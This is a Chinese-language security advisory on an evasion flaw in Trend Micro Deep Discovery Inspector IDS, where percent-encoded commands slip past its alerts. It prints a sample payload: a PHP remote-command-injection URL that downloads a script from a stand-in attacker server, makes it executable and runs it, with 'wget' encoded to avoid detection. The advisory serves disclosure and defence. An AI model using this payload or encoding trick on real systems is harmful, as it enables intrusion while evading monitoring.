Trend Micro Deep Discovery Inspector IDS安全绕过漏洞安全通告

发布时间 2019-07-26

漏洞编号和级别


CVE编号:暂无,危险级别:高危,CVSS分值:官方未评定


影响版本


受影响的版本


Trend Micro Deep Discovery Inspector IDS


漏洞概述


Trend Micro Deep Discovery Inspector IDS 是一种网络设备,可监控所有类型和超过105种不同的网络协议,以发现进出网络的高级威胁和有针对性的攻击。2019年7月24日,研究人员披露了Trend Micro Deep Discovery Inspector IDS 安全绕过漏洞的详情。安全绕过漏洞源于网络系统或产品中缺少内容验证规则或对内容验证强度不足。


漏洞验证


经过分析,IDS发现恶意系统命令(如“Wget  Commandline  Injection”)会发出警报,并且将它们标记为高风险。攻击者将payload与普通的ascii字符一起发送,例如“wget”,即使它们进行了如“\ x77 \ x67 \ x65 \ x74”的编码,仍会发出警报。但是,攻击者可以通过在HEX中以百分号字符“%”开头的恶意命令来轻松绕过这些警报,例如,“%77% 67%65%74”也转换为“wget”,不仅不会被标记或警告,也可以在目标系统上实行。


Payload:


/index.php?s=/index/vulnerable/app/invoke&function=call_user_func_array&v ars[0]=system&vars[1][]=%77%67%65%74%20http://Attacker-Server/x.sh%20-O% 20/tmp/a;%20chmod%200777%20/tmp/a;%20/tmp/a


修复建议


关注官方网站,及时下载补丁更新。


参考链接